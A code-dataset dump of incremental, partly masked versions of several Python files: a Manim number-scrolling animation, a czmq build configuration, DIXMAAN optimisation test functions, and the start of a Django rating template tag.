Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-3": "<mask token>\n\n\nclass A_Scroller(Scene):\n CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-4": "from manimlib.imports import *\n\n\nclass A_Scroller(Scene):\n CONFIG = {'camera_config': {'background_color': '#FFFFFF'}}\n\n def construct(self):\n text_1 = Text('3493', color='#DC3832')\n text_2 = Text('3646', color='#221F20').shift(2 * RIGHT)\n text_3 = Text('4182', color='#2566AD').shift(4 * RIGHT)\n text_4 = Text('16417', color='#DC3832').shift(6 * RIGHT)\n text_5 = Text('18209', color='#221F20').shift(8 * RIGHT)\n text_6 = Text('18569', color='#2566AD').shift(10 * RIGHT)\n text_7 = Text('22229', color='#DC3832').shift(12 * RIGHT)\n text_8 = Text('24928', color='#221F20').shift(14 * RIGHT)\n text_9 = Text('26827', color='#2566AD').shift(16 * RIGHT)\n text_10 = Text('29779', color='#DC3832').shift(18 * RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6,\n text_7, text_8, text_9, text_10)\n text_11 = Text('30898', color='#221F20').shift(DOWN)\n text_12 = Text('31568', color='#2566AD').shift(2 * RIGHT + DOWN)\n text_13 = Text('32075', color='#DC3832').shift(4 * RIGHT + DOWN)\n text_14 = Text('32777', color='#221F20').shift(6 * RIGHT + DOWN)\n text_15 = Text('33959', color='#2566AD').shift(8 * RIGHT + DOWN)\n text_16 = Text('35450', color='#DC3832').shift(10 * RIGHT + DOWN)\n text_17 = Text('37680', color='#221F20').shift(12 * RIGHT + DOWN)\n text_18 = Text('38268', color='#2566AD').shift(14 * RIGHT + DOWN)\n text_19 = Text('38269', color='#DC3832').shift(16 * RIGHT + DOWN)\n text_20 = Text('38849', color='#221F20').shift(18 * RIGHT + DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15,\n text_16, text_17, text_18, text_19, text_20)\n text_21 = Text('44204', color='#2566AD').shift(2 * DOWN)\n text_22 = Text('44798', color='#DC3832').shift(2 * RIGHT + 2 * DOWN)\n text_23 = Text('44814', color='#221F20').shift(4 * RIGHT + 2 * DOWN)\n text_24 = Text('45084', color='#2566AD').shift(6 * RIGHT + 2 * DOWN)\n text_25 = Text('45252', color='#DC3832').shift(8 * RIGHT + 2 * DOWN)\n text_26 = Text('46041', color='#221F20').shift(10 * RIGHT + 2 * DOWN)\n text_27 = Text('46380', color='#2566AD').shift(12 * RIGHT + 2 * DOWN)\n text_28 = Text('47891', color='#DC3832').shift(14 * RIGHT + 2 * DOWN)\n text_29 = Text('51126', color='#221F20').shift(16 * RIGHT + 2 * DOWN)\n text_30 = Text('51599', color='#2566AD').shift(18 * RIGHT + 2 * DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25,\n text_26, text_27, text_28, text_29, text_30)\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2 * UP).shift(20 * RIGHT)\n all_numbers_2.move_to(2 * UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10,\n rate_func=linear)\n",
"step-5": "from manimlib.imports import *\n\nclass A_Scroller(Scene):\n CONFIG={\n \"camera_config\":{\"background_color\":\"#FFFFFF\"}\n }\n def construct(self):\n text_1 = Text(\"3493\", color=\"#DC3832\")\n text_2 = Text(\"3646\", color=\"#221F20\").shift(2*RIGHT)\n text_3 = Text(\"4182\", color=\"#2566AD\").shift(4*RIGHT)\n text_4 = Text(\"16417\", color=\"#DC3832\").shift(6*RIGHT)\n text_5 = Text(\"18209\", color=\"#221F20\").shift(8*RIGHT)\n text_6 = Text(\"18569\", color=\"#2566AD\").shift(10*RIGHT)\n text_7 = Text(\"22229\", color=\"#DC3832\").shift(12*RIGHT)\n text_8 = Text(\"24928\", color=\"#221F20\").shift(14*RIGHT)\n text_9 = Text(\"26827\", color=\"#2566AD\").shift(16*RIGHT)\n text_10 = Text(\"29779\", color=\"#DC3832\").shift(18*RIGHT)\n line_1 = VGroup(text_1, text_2, text_3, text_4, text_5, text_6, text_7, text_8, text_9, text_10)\n\n text_11 = Text(\"30898\", color=\"#221F20\").shift(DOWN)\n text_12 = Text(\"31568\", color=\"#2566AD\").shift(2*RIGHT+DOWN)\n text_13 = Text(\"32075\", color=\"#DC3832\").shift(4*RIGHT+DOWN)\n text_14 = Text(\"32777\", color=\"#221F20\").shift(6*RIGHT+DOWN)\n text_15 = Text(\"33959\", color=\"#2566AD\").shift(8*RIGHT+DOWN)\n text_16 = Text(\"35450\", color=\"#DC3832\").shift(10*RIGHT+DOWN)\n text_17 = Text(\"37680\", color=\"#221F20\").shift(12*RIGHT+DOWN)\n text_18 = Text(\"38268\", color=\"#2566AD\").shift(14*RIGHT+DOWN)\n text_19 = Text(\"38269\", color=\"#DC3832\").shift(16*RIGHT+DOWN)\n text_20 = Text(\"38849\", color=\"#221F20\").shift(18*RIGHT+DOWN)\n line_2 = VGroup(text_11, text_12, text_13, text_14, text_15, text_16, text_17, text_18, text_19, text_20)\n\n text_21 = Text(\"44204\", color=\"#2566AD\").shift(2*DOWN)\n text_22 = Text(\"44798\", color=\"#DC3832\").shift(2*RIGHT+2*DOWN)\n text_23 = Text(\"44814\", color=\"#221F20\").shift(4*RIGHT+2*DOWN)\n text_24 = Text(\"45084\", color=\"#2566AD\").shift(6*RIGHT+2*DOWN)\n text_25 = Text(\"45252\", color=\"#DC3832\").shift(8*RIGHT+2*DOWN)\n text_26 = Text(\"46041\", color=\"#221F20\").shift(10*RIGHT+2*DOWN)\n text_27 = Text(\"46380\", color=\"#2566AD\").shift(12*RIGHT+2*DOWN)\n text_28 = Text(\"47891\", color=\"#DC3832\").shift(14*RIGHT+2*DOWN)\n text_29 = Text(\"51126\", color=\"#221F20\").shift(16*RIGHT+2*DOWN)\n text_30 = Text(\"51599\", color=\"#2566AD\").shift(18*RIGHT+2*DOWN)\n line_3 = VGroup(text_21, text_22, text_23, text_24, text_25, text_26, text_27, text_28, text_29, text_30)\n\n all_numbers_1 = VGroup(line_1, line_2, line_3)\n all_numbers_2 = all_numbers_1.copy()\n all_numbers_1.move_to(2*UP).shift(20*RIGHT)\n all_numbers_2.move_to(2*UP)\n all_numbers = VGroup(all_numbers_1, all_numbers_2).to_edge(LEFT)\n\n self.add(all_numbers)\n self.play(ApplyMethod(all_numbers.to_edge, RIGHT), run_time=10, rate_func=linear)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import generic
name = __name__
def options(opt):
generic._options(opt, name)
def configure(cfg):
generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=
name.lower(), uses='LIBZMQ', mandatory=True)
|
normal
|
{
"blob_id": "9e511c769f6ccedc06845a382171fb3729913d05",
"index": 9767,
"step-1": "<mask token>\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-3": "<mask token>\nname = __name__\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-4": "import generic\nname = __name__\n\n\ndef options(opt):\n generic._options(opt, name)\n\n\ndef configure(cfg):\n generic._configure(cfg, name, incs=('czmq.h',), libs=('czmq',), pcname=\n name.lower(), uses='LIBZMQ', mandatory=True)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table_DIXMAAN = dict()
table_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1
table_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0
table_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1
table_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1
table_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2
table_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
from .test_function import *
from .support_funcs import *
table_DIXMAAN = dict()
table_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1
table_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0
table_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0
table_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1
table_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1
table_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1
table_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2
table_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2
table_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2
def DIXMAAN(type):
def DIXMAAN_(n):
name = 'DIXMAAN%c function (CUTE)' % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /
n) ** k2
sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4
f_1 = lambda : sum([sm2(i) for i in range(1, n)])
f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])
f = lambda : 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=
default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
<|reserved_special_token_1|>
from .test_function import *
from .support_funcs import *
table_DIXMAAN = dict()
table_DIXMAAN['A'] = (1, 0, 0.125, 0.125, 0, 0, 0, 0)
table_DIXMAAN['B'] = (1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1)
table_DIXMAAN['C'] = (1, 0.125, 0.125, 0.125, 0, 0, 0, 0)
table_DIXMAAN['D'] = (1, 0.26, 0.26, 0.26, 0, 0, 0, 0)
table_DIXMAAN['E'] = (1, 0, 0.125, 0.125, 1, 0, 0, 1)
table_DIXMAAN['F'] = (1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1)
table_DIXMAAN['G'] = (1, 0.125, 0.125, 0.125, 1, 0, 0, 1)
table_DIXMAAN['H'] = (1, 0.26, 0.26, 0.26, 1, 0, 0, 1)
table_DIXMAAN['I'] = (1, 0, 0.125, 0.125, 2, 0, 0, 2)
table_DIXMAAN['J'] = (1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2)
table_DIXMAAN['K'] = (1, 0.125, 0.125, 0.125, 2, 0, 0, 2)
table_DIXMAAN['L'] = (1, 0.26, 0.26, 0.26, 2, 0, 0, 2)
def DIXMAAN(type):
def DIXMAAN_(n):
name = "DIXMAAN%c function (CUTE)" % type
alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]
m = n // 3
sm = lambda i: alpha * xi(i) ** 2 *(i / n) ** k1
sm2 = lambda i: beta * xi(i) ** 2 * (xi(i+1) + xi(i+1)**2) * (i / n) ** k2
sm3 = lambda i: gamma * xi(i)**2 * xi(i+m) ** 4 * (i / n) ** k3
sm4 = lambda i: sigma * xi(i) * xi(i+2*m) * (i / n) ** k4
f_1 = lambda: sum([sm2(i) for i in range(1, n)])
f_2 = lambda: sum([sm3(i) for i in range(1, 2 * m + 1)])
f_3 = lambda: sum([sm4(i) for i in range(1, m + 1)])
f = lambda: 1 + f_1() + f_2() + f_3()
x0 = np.ones((n, 1)) * 2.0
return create_test_function(name, n, sm, x0, first=f, range_func=default_range_1)
DIXMAAN_.__name__ += type
return DIXMAAN_
|
flexible
|
{
"blob_id": "7026f4549019c25cb736af556fe46fd360fba46f",
"index": 2238,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
"step-3": "<mask token>\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1\ntable_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0\ntable_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1\ntable_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1\ntable_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2\ntable_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
"step-4": "from .test_function import *\nfrom .support_funcs import *\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1\ntable_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0\ntable_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1\ntable_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1\ntable_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2\ntable_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
"step-5": "from .test_function import *\nfrom .support_funcs import *\n\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = (1, 0, 0.125, 0.125, 0, 0, 0, 0)\ntable_DIXMAAN['B'] = (1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1)\ntable_DIXMAAN['C'] = (1, 0.125, 0.125, 0.125, 0, 0, 0, 0)\ntable_DIXMAAN['D'] = (1, 0.26, 0.26, 0.26, 0, 0, 0, 0)\ntable_DIXMAAN['E'] = (1, 0, 0.125, 0.125, 1, 0, 0, 1)\ntable_DIXMAAN['F'] = (1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1)\ntable_DIXMAAN['G'] = (1, 0.125, 0.125, 0.125, 1, 0, 0, 1)\ntable_DIXMAAN['H'] = (1, 0.26, 0.26, 0.26, 1, 0, 0, 1)\ntable_DIXMAAN['I'] = (1, 0, 0.125, 0.125, 2, 0, 0, 2)\ntable_DIXMAAN['J'] = (1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2)\ntable_DIXMAAN['K'] = (1, 0.125, 0.125, 0.125, 2, 0, 0, 2)\ntable_DIXMAAN['L'] = (1, 0.26, 0.26, 0.26, 2, 0, 0, 2)\n\n\ndef DIXMAAN(type):\n def DIXMAAN_(n):\n name = \"DIXMAAN%c function (CUTE)\" % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 *(i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i+1) + xi(i+1)**2) * (i / n) ** k2\n sm3 = lambda i: gamma * xi(i)**2 * xi(i+m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i+2*m) * (i / n) ** k4\n f_1 = lambda: sum([sm2(i) for i in range(1, n)])\n f_2 = lambda: sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda: sum([sm4(i) for i in range(1, m + 1)])\n f = lambda: 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
'Ожидался экземпляр django.models.Model, а получили %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
'Ожидался экземпляр django.models.Model, а получили %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
<|reserved_special_token_0|>
register.tag(RatingBlock)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
'Ожидался экземпляр django.models.Model, а получили %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
register = template.Library()
register.tag(RatingBlock)
<|reserved_special_token_1|>
from django import template
from classytags.helpers import InclusionTag
from classytags.core import Tag, Options
from classytags.arguments import Argument
from ratings.models import RatedItem
from blogs.permissions import Permissions
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
